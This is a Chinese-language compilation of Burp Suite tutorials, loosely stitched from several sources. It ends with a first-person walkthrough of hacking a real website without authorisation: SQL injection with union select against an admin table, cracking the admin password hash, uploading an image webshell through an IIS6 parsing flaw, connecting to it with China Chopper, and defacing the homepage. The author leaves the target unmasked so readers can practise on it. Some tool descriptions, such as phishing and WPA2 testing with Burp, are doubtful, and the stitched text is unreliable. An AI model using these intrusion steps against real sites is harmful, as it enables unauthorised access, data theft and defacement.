burpsuite抓包技巧【最新版】目录一、什么是 Burp Suite二、Burp Suite 的抓包方法1.设置代理2.抓包过程3.拦截和修改数据包4.在安卓 APP 测试中的应用5.抓取 HTTPS 包正文一、什么是 Burp SuiteBurp Suite 是一个用于渗透测试和 Web 应用程序安全测试的工具套件,它主要包括以下几个组件:Proxy 代理服务器、Scanner 漏洞扫描器、Intruder 攻击工具、Repeater 重复器、Sequencer 序列化器、Decoder 解码器、Comparer 比较器、Extender 扩展器。
其中,Proxy 代理服务器是 Burp Suite 的核心组件,它可以拦截、重放和修改 HTTP/S 请求与响应,帮助安全测试人员发现 Web 应用程序的安全漏洞。
二、Burp Suite 的抓包方法1.设置代理在使用 Burp Suite 进行抓包之前,首先需要在浏览器中设置代理服务器。
一般情况下,可以通过以下步骤进行设置:(1)打开浏览器,点击菜单栏中的“工具”选项;(2)选择“Internet 选项”,打开设置对话框;(3)在“连接”选项卡中,点击“局域网设置”按钮;(4)在“局域网设置”对话框中,勾选“使用代理服务器”选项;(5)填入代理服务器的地址和端口,通常为 127.0.0.1:8080。
2.抓包过程设置好代理服务器后,当浏览器发起请求时,Burp Suite 会自动拦截并记录请求与响应数据包。
在 Burp Suite 中,可以通过以下步骤查看抓取到的数据包:(1)打开 Burp Suite,确保 Proxy 代理服务器正在运行;(2)在浏览器中访问一个网站,观察 Burp Suite 中的“Proxy”选项卡,可以看到拦截到的请求与响应数据包;(3)点击某个数据包,可以查看该数据包的详细信息,如请求方法、URL、请求头、请求体等。
手工测试xss没啥技术含量,只是把自己手工挖xss的简单心得和大家分享下。
Xss的形成原因无非是用户输入的xss代码经过服务器之后原封不动的返回到客户端中,这样攻击者就可以写出带有恶意行为的js脚本,传送给受害者,使得脚本在受害者机子上进行执行,最常见的就是盗取用户的cookies。
复杂的就需要懂很多javascript知识。
现在的网站几乎大部分都会有与用户交互的功能,用户可以提交数据之类的,再加上开发对用户输入的数据过滤检查不严格,这样就很容易造成xss。
很多的工具可以扫到xss漏洞,工具的扫描过程有可能是对一个网址开始进行爬虫,查找用户可以输入的参数,可能是get方法的,可能是post方法的,更改输入参数值,使用自带的xss测试语句进行测试,观察返回的数据中有没有这些测试语句。
但是很多的扫描工具扫描的并不是很全面。
有可能漏掉很多。
使用手工测试xss和工具扫描的原理是一样的,更改传递给服务器的参数值,观察返回的数据中参数值的变化,一般测试时,我习惯输入</21212>,这样若是返回的页面源代码中含有</21212>,那这个站90%的就可以进行xss,当然若要触发的话大多数情况下还需要你进行闭合操作。
在手工测试xss中最重要的就是对一个站或是一个网址数据包的抓取及修改的过程,这样的工具很多,fiddler、brupsuite等代理工具就可以实现抓包、改报的操作。
我测试时喜欢brupsuite,虽然免费的功能有所限制,但是对于自己抓包完全够用了。
对于brupsuite的资料现在中文的貌似不是很多,自己也是一点点的摸索出来的。
下面使用brupsuite做个简单的使用介绍。
使用brupsuite,首先需要对浏览器进行代理设置,推荐firefox+proxy,用ie的话该代理,本机上网都会通过这个代理。
打开brupsuite,先把intercept关掉,否则访问网页需要你手工放行。
burpsuite使用手册一、Burp Suite 简介与安装Burp Suite 是一款功能强大的网络安全测试工具,由多个模块组成,包括代理服务器、扫描器、漏洞利用工具、数据包分析器以及定制攻击工具。
它广泛应用于渗透测试、网站安全检测以及网络安全研究等领域。
安装Burp Suite 非常简单,只需遵循官方提供的安装指南即可。
在安装过程中,用户可以根据自己的需求选择所需的模块。
需要注意的是,为了确保Burp Suite 正常运行,安装时需关闭其他同类工具,以免发生冲突。
二、功能模块概述1.代理服务器:Burp Suite 内置了代理服务器,可以捕获并分析经过代理的HTTP/S 请求与响应,帮助用户了解客户端与目标服务器之间的通信过程。
2.扫描器:Burp Suite 提供了多种扫描器,如SQL 注入扫描器、XSS 扫描器、文件包含扫描器等,用于自动化地发现网站漏洞。
3.漏洞利用工具:Burp Suite 集成了多种漏洞利用工具,如命令行工具、Payload 生成器等,方便用户手动利用漏洞进行渗透测试。
4.数据包分析器:Burp Suite 的数据包分析器可以详细显示请求与响应的报文结构,帮助用户深入分析网络通信过程。
5.定制攻击工具:Burp Suite 提供了丰富的定制攻击工具,如Web 漏洞利用工具、代理攻击工具等,满足用户在实际渗透测试中的需求。
三、实战应用案例1.网站漏洞测试:使用Burp Suite 的扫描器功能,可以自动化地发现网站存在的漏洞,如SQL 注入、XSS 攻击等。
此外,还可以利用Burp Suite 的漏洞利用工具进行手动测试,进一步验证漏洞是否可被利用。
2.网络钓鱼攻击:通过Burp Suite 定制攻击工具,可以轻松地构造并发送恶意请求,如伪造的登录表单、恶意链接等,实现对目标的网络钓鱼攻击。
3.无线网络安全测试:结合Burp Suite 的代理服务器和数据包分析器,可以对无线网络进行安全测试,如测试WPA2 密码强度、扫描无线设备漏洞等。
Burpsuite⼊门及使⽤详细教程⽬录1、简介2、标签3、操作1、简介Burp Suite是⽤于攻击web应⽤程序的集成平台。
它包含了许多⼯具,并为这些⼯具设计了许多接⼝,以促进加快攻击应⽤程序的过程。
所有的⼯具都共享⼀个能处理并显⽰HTTP消息,持久性,认证,代理,⽇志,警报的⼀个强⼤的可扩展的框架。
2、标签1. Target(⽬标)——显⽰⽬标⽬录结构的的⼀个功能2. Proxy(代理)——拦截HTTP/S的代理服务器,作为⼀个在浏览器和⽬标应⽤程序之间的中间⼈,允许你拦截,查看,修改在两个⽅向上的原始数据流。
3. Spider(蜘蛛)——应⽤智能感应的⽹络爬⾍,它能完整的枚举应⽤程序的内容和功能。
4. Scanner(扫描器)——⾼级⼯具,执⾏后,它能⾃动地发现web 应⽤程序的安全漏洞。
5. Intruder(⼊侵)——⼀个定制的⾼度可配置的⼯具,对web应⽤程序进⾏⾃动化攻击,如:枚举标识符,收集有⽤的数据,以及使⽤fuzzing 技术探测常规漏洞。
6. Repeater(中继器)——⼀个靠⼿动操作来触发单独的HTTP 请求,并分析应⽤程序响应的⼯具。
7. Sequencer(会话)——⽤来分析那些不可预知的应⽤程序会话令牌和重要数据项的随机性的⼯具。
8. Decoder(解码器)——进⾏⼿动执⾏或对应⽤程序数据者智能解码编码的⼯具。
9. Comparer(对⽐)——通常是通过⼀些相关的请求和响应得到两项数据的⼀个可视化的“差异”。
10. Extender(扩展)——可以让你加载Burp Suite的扩展,使⽤你⾃⼰的或第三⽅代码来扩展Burp Suit的功能。
11. Options(设置)——对Burp Suite的⼀些设置。
3、操作捕获HTTP数据包:以firefox⽕狐浏览器为例:点击选项——⾼级——⽹络——设置——选择⼿动配置代理,HTTP代理输⼊:127.0.0.1端⼝:8080打开burpsuite,点击proxy——Options勾选127.0.0.1:8080。
burpsuite使用方法BurpSuite是一款常用的渗透测试工具,支持代理、漏洞扫描、爆破、应用安全等多种功能。
以下是Burp Suite的使用方法:1.安装和启动Burp Suite下载Burp Suite并解压缩,双击启动Burp Suite。
在弹出的窗口中,选择'http proxy'并点击'Next'。
2.配置浏览器代理在浏览器中,配置代理为'127.0.0.1'和'8080'端口。
3.使用Burp Suite进行代理在Burp Suite中,选择'Proxy'-'Intercept'并勾选'Intercept is on',即可开始拦截请求。
在浏览器中访问任意网站,Burp Suite 将截获请求并显示在'Proxy'-'Intercept'中。
4.使用Burp Suite进行漏洞扫描在Burp Suite中,选择'Target'-'Site map',并点击'Add scope'添加目标站点。
然后选择'Engagement tools'-'Scanner',选择扫描目标并启动扫描。
5.使用Burp Suite进行爆破在Burp Suite中,选择'Intruder'-'Positions',将需要爆破的参数标记为'<>'.选择'Payloads'并添加需要爆破的字典,然后选择'Start attack'启动爆破。
6.使用Burp Suite进行应用安全测试在Burp Suite中,选择'Project options'-'HTTP headers',添加需要测试的HTTP头。
burpsuite 工具使用手册
摘要:
1.概述
2.安装与配置
3.使用方法
4.常见问题
5.总结
正文:
1.概述
Burp Suite 是一个用于渗透测试和Web 应用程序安全测试的综合平台。
它包含了许多功能强大的工具,如代理服务器、漏洞检测、扫描仪、渗透测试工具等,是网络安全专业人士的必备工具之一。
2.安装与配置
安装Burp Suite 非常简单,只需下载对应版本的安装程序并按照提示进行安装即可。
安装完成后,需要对Burp Suite 进行一些基本配置,如设置代理规则、自定义扫描策略等,以确保其正常运行。
3.使用方法
在使用Burp Suite 进行渗透测试时,一般遵循以下步骤:
(1) 启动Burp Suite,并确保代理服务器正在运行。
(2) 在浏览器中设置代理设置,将代理服务器设置为Burp Suite 的代理服务器。
(3) 访问目标网站,Burp Suite 将捕获并分析所有的HTTP 请求和响应。
(4) 使用Burp Suite 的渗透测试工具,如漏洞扫描器、注入测试工具等,对目标网站进行渗透测试。
(5) 根据测试结果,对目标网站进行安全加固。
4.常见问题
在使用Burp Suite 时,可能会遇到一些常见问题,如代理服务器无法启动、扫描结果不准确等。
对于这些问题,可以通过查阅官方文档、咨询专业人士或进行社区讨论来解决。
5.总结
Burp Suite 是一款功能强大的渗透测试工具,可以帮助网络安全专业人士快速、有效地对Web 应用程序进行安全测试。
之前由于不会安装vm版的bt5而在网上求救,结果认识了一找不到片的基友,00后的,,感觉顿时无语了…………聊天时,他说sqlmap 和burpsuite都很强大…………玩完sqlmap后,就一直想学burpsuite来着,,但是一直都没学,这几天才刚开始完的…………感觉确实强大,能够拦截,查看和修改网站流量………………不废话,开始
目标站,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX)
点一链接,在网站后加 and 1=1 回车,页面正常,,加and 1=2 ,回车,不正常,,,判断存在sql
注入漏洞(当然存在啊,不然怎么做教程,只是说下如何判断注入)
然后order by 查询字段(是叫做字段吗,我对概念不清楚,虽然我为这还自学了mysql……暂且叫字段吧)
如图,12不正常,11正常,说明字段为11(11之前的都正常)
然后在地址后加入 union select 1,2,3,4,5,6,7,8,9,10,11 from admin,也就是访问
/show_content.asp?id=1361 union select 1,2,3,4,5,6,7,8,9,10,11 from admin(别问我admin哪来的,,微软access数据库默认的表,也不能说是默认的吧,大多都是这样,下面的username和password也是这样),看图吧
看到2 3 没,爆出查询点了,,把2换成username,3换成password(当然2换成password,3为username也行),回车,如图
username为admin,,密码为MD5加密的值,拿去解密,如图
密码为jiexin 再去后台,默认为在网站后加/admin,,go go
登陆进去吧,go
然后,,没然后了
有些人到这了就会去改点新闻内容,啥的,不过都看不到网站源码,,有什么用…………只能改点东西而已
拿不到webshell的黑客不是好黑客……当然,这不是黑客,脚本小子而已,但还是得拿webshell啊,,继续
看看能不能传一句话木马(就是在上传图片的地方传一句话木马),如图,靠,不行
唉,看到iis6.0没,就从iis6.0的解析漏洞入手吧,有的后台不显示iis6.0,那就去站长工具查询吧,上图吧,真烦人
接下来的问题就是传马,但asp的格式传不了,也就是传一个jpg等图片格式的,让它被解析成asp运行
对了,我比较喜欢用图片马,就教下大家怎么做图片马吧,不需要任何软件,,如图,在记事本里写上一句话木马(密码为syx,可以随便改),随便准备一张图片,这两个要在同一目录,cmd里进入该目录,合成…………靠,暴露名字了,求大家不要人肉我啊,呜呜
看到没,生成3.png了,这就是图片马
祭出杀器,burpsuite,,不过burpsuite要在java环境下运行,windows下还得安装java环境,麻烦啊,还好kali自带,开kali 吧
我kali在虚拟机里……,把图片马弄进去(怎么弄就不说了,不然又要写一大堆东西),,然后输入命令burpsuite,回车,看图吧
burpsuite打开后,看图吧,不想打字,记下
这个默认是on,点下,变成off,看图
打开浏览器,设置下代理,端口,看图
这个地方填刚刚记下来的
ok,,去后台上传图片马吧,,这个时候,一定不要点开始上传
去burpsuite开启抓包,就是刚刚关了的,变成off的,点下,变成on,看图
on 了后,,在开始点上传,,再不管他了,去burpsuite吧,右键,如图操作,再去repeater
会看到这个,先用目录解析漏洞吧,加个目录1.asp,然后go
go了后出现右边的,复制地址,去主机访问吧,
靠,地址错了啊,还是目录错了,还是1.asp目录没建立起来,,查查其他图片目录吧
原来少了admin这个目录,靠,重新访问
麻痹,还是不行,那就是目录建立不起来,那就文件解析漏洞吧,如图改包,加上1.asp;. go后复制地址再访问,就是访问/admin/job/1.asp;.201………….png
省略的内容自己看
哇靠,成功了,图片马运行成功了,看图吧
接下来连接木马了,拿webshell了,开中国菜刀,地址填上图片马的地址,密码刚刚写的,syx,脚本类型当然asp啊,添加
双击这个
看到没,这就是这个站的所有文件,我们可以随便对这个站做任何事了(不过不要这样,小心警察叔叔哦)
找到主页吧,悄悄装个逼,改了,不过先下载下来,等会还原
写个黑页吧,,不然·对不起自己自学的html了,我html5也就刚入门…………
看效果吧
靠,我太坏了,,,赶紧改回来,,,接下来看能不能提权服务器吧
靠,没权限………………好了,算了吧,就这样了
难怪我那找不到片的基友说提权就是提钱…………
行了,最后多说一句,这次准备打码的,不暴露网站地址的,但考虑到有些朋友需要找站练练手,就没打码
感觉这个站的漏洞还是比较多的,正好给我们提供了一个练习平台,分享给大家了
最后说句脏话,谁要是看了我这个教程而去把这个站黑了的,挂黑页不改回来,加广告,删网页,总之影响这个站的正常运行,我日你祖宗十八代
当然,你没看这个教程,你黑了这个站,我管不着…………
不说了,拜拜。